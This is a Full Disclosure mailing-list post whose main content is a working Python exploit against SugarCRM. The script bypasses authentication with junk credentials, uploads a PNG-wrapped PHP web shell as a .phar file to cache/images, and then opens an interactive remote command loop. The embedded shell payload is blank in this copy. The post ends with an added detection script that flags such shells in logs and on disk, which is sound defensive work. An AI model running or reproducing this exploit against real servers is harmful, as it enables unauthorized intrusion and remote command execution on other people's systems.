SugarCRM 0-day Auth Bypass + RCE Exploit

From: “sw33t.0day via Fulldisclosure” <fulldisclosure () seclists org>
Date: Wed, 28 Dec 2022 08:42:12 +0000

#!/usr/bin/env python3
# SugarCRM 0-day Auth Bypass + RCE Exploit
# Dorks:

import base64, re, requests, sys, uuid


if len(sys.argv) != 2:
    sys.exit("Usage: %s [URL]" % sys.argv[0])
print("[+] Sending authentication request")

# Step 1: the auth bypass. A login request with junk credentials against
# module=Users&action=Authenticate is enough for the PHPSESSID we choose
# here to be accepted on the upload request that follows.
url     = sys.argv[1] + "/index.php"
session = {"PHPSESSID": str(uuid.uuid4())}
params  = {"module": "Users", "action": "Authenticate", "user_name": 1, "user_password": 1}
requests.post(url, cookies=session, data=params, verify=False)

print("[+] Uploading PHP shell\n")

# Step 2: upload a PHP shell wrapped in PNG bytes through the EmailTemplates
# AttachFiles action. The file is written to cache/images/ under the name we
# supply, so a script extension makes the web server execute it.
png_sh = ""  # base64-encoded PNG-wrapped PHP shell; the payload is not present in this copy of the post
upload = {"file": ("sweet.phar", base64.b64decode(png_sh), "image/png")}  # you can also try with other extensions like .php7 .php5 or .phtml
params = {"module": "EmailTemplates", "action": "AttachFiles"}
requests.post(url, cookies=session, data=params, files=upload, verify=False)

url = sys.argv[1] + "/cache/images/sweet.phar"

# Step 3: interactive loop. The shell takes the command base64-encoded in the
# POST field "c" and returns its output wrapped in ##### markers.
while True:
    cmd = input("# ")
    res = requests.post(url, data={"c": base64.b64encode(cmd.encode())}, verify=False)
    res = re.search("#####(.*)#####", res.text, re.DOTALL)
    if res:
        print(res.group(1))
    else:
        sys.exit("\n[+] Failure!\n")
Sent through the Full Disclosure mailing list
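The script above leaves two artifacts a defender can look for: requests to a script-extension file under /cache/images/ in the web server access log, and the uploaded file itself, which is PHP wrapped in PNG bytes regardless of the extension it was given. The following is an added detection example and is not part of the Full Disclosure post or of SugarCRM; the log lines and the files it scans are constructed samples, and the combined-log-format layout and the cache/images path are assumptions taken from the script.

```python
import os
import re
import tempfile

# Extensions the post names as executable when the upload lands under
# cache/images (.phar is what the exploit uses; .php5/.php7/.phtml are its
# own suggested alternatives); plain .php is added as the obvious case.
EXEC_EXTS = (".phar", ".php", ".php5", ".php7", ".phtml")

# Apache/nginx combined log format: client, timestamp, request line,
# status, size, referer, user agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Constructed sample access-log lines (not real traffic). The first three
# mimic the exploit's sequence: two POSTs to index.php (Authenticate, then
# AttachFiles, whose form fields are not visible in an access log) followed
# by a POST to the dropped .phar. The last two are a legitimate cached image
# and a probe for a shell that is not there.
SAMPLE_LOG = """\
203.0.113.5 - - [28/Dec/2022:08:42:12 +0000] "POST /index.php HTTP/1.1" 200 1843 "-" "python-requests/2.28.1"
203.0.113.5 - - [28/Dec/2022:08:42:13 +0000] "POST /index.php HTTP/1.1" 200 97 "-" "python-requests/2.28.1"
203.0.113.5 - - [28/Dec/2022:08:42:14 +0000] "POST /cache/images/sweet.phar HTTP/1.1" 200 212 "-" "python-requests/2.28.1"
198.51.100.7 - - [28/Dec/2022:08:43:02 +0000] "GET /cache/images/logo_abc123.png HTTP/1.1" 200 4096 "https://crm.example/" "Mozilla/5.0"
203.0.113.5 - - [28/Dec/2022:08:44:30 +0000] "GET /cache/images/shell.phtml?c=aWQ= HTTP/1.1" 404 0 "-" "curl/7.85.0"
"""


def find_webshell_hits(log_text):
    """Return (ip, ts, method, path, status) for every request whose path is
    a script-extension file under /cache/images/. A 200 means the dropped
    file was served (and, with PHP handling that extension, executed); a 404
    is still worth an alert because it is a probe for the same technique."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m.group("path").split("?", 1)[0].lower()
        if "/cache/images/" in path and path.endswith(EXEC_EXTS):
            hits.append((m.group("ip"), m.group("ts"), m.group("method"),
                         m.group("path"), int(m.group("status"))))
    return hits


def scan_cache_images(directory):
    """Return names of files in a cache/images directory that carry a script
    extension or contain a PHP open tag regardless of extension: the exploit
    uploads its shell as image/png with PNG bytes in front, so a file renamed
    back to .png is still caught by the content check."""
    suspicious = []
    for name in sorted(os.listdir(directory)):
        full = os.path.join(directory, name)
        if not os.path.isfile(full):
            continue
        with open(full, "rb") as f:
            head = f.read(64 * 1024)
        if name.lower().endswith(EXEC_EXTS) or b"<?php" in head:
            suspicious.append(name)
    return suspicious


def build_demo_cache_dir():
    """Create a temporary directory of constructed sample files: a plausible
    PNG, a PNG-wrapped PHP file under the exploit's .phar name, and the same
    content renamed to .png. Returns the directory path."""
    d = tempfile.mkdtemp(prefix="cache_images_")
    png_header = b"\x89PNG\r\n\x1a\n"
    samples = {
        "logo_abc123.png": png_header + b"\x00" * 32,
        "sweet.phar": png_header + b"<?php /* constructed sample */ ?>",
        "disguised.png": png_header + b"<?php /* constructed sample */ ?>",
    }
    for name, content in samples.items():
        with open(os.path.join(d, name), "wb") as f:
            f.write(content)
    return d


if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print("[log] %s %s %s -> %d" % (hit[0], hit[2], hit[3], hit[4]))
    for name in scan_cache_images(build_demo_cache_dir()):
        print("[fs]  suspicious file in cache/images: %s" % name)
```

The log check cannot see the module/action form fields of the two index.php POSTs, so the request to the dropped file is the first thing the access log shows; the file-system check covers the case where the attacker renames or the log has rotated. Point scan_cache_images at the real cache/images directory of an installation to use it outside the demo.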